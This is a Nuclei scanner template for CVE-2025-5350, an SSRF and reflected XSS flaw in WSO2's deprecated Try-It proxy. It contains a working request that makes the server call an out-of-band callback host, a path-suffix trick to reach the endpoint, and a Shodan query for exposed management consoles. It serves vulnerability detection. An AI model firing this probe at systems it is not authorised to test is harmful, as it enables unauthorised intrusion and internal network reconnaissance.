WSO2 - Server Side Request Forgery

id: CVE-2025-5350

info:
  name: WSO2 - Server Side Request Forgery
  author: Sourabh Grover
  severity: medium
  description: |
    WSO2 products contain SSRF and reflected XSS vulnerabilities in the deprecated Try-It feature accessible only to administrative users, caused by improper URL validation and direct content reflection, letting attackers trick admins into executing arbitrary JavaScript and querying internal services.
  impact: |
    Attackers can execute arbitrary JavaScript in admin browsers and perform internal network requests, risking UI manipulation, data exfiltration, and internal service enumeration.
  remediation: |
    Remove or secure the deprecated Try-It feature and validate user-supplied URLs properly; update to the latest product versions with fixes.
  reference:
    - https://crnkovic.dev/wso2-server-side-request-forgery/
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 5.9
    cve-id: CVE-2025-5350
    epss-score: 0.00654
    epss-percentile: 0.71167
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    vendor: wso2
    product: api_manager
    shodan-query: http.title:"WSO2 Management Console"
  tags: cve,cve2025,ssrf,wso2,carbon,oast,oob

variables:
  cb_url: "http://{{interactsh-url}}/"
  uri_b64: "{{base64(cb_url)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/carbon/admin/jsp/WSRequestXSSproxy_ajaxprocessor.jsp;b=.jar?uri={{uri_b64}}&pattern=%7E&username=%7E&password=%7E&payload=%7E"

    redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns") || contains(interactsh_protocol, "http")'
          - 'contains(body, "AxisFault")'
        condition: and
# digest: 490a0046304402207e41c42397ffa91e25ae12585051c672937df98d3dc6d1821d8c404d22d0778b0220157b53e0f9583930b3318bc0b4313b3b3f512eaf528d7785e9ad8d4067749b03:922c64590222798bb761d5b6d8e72950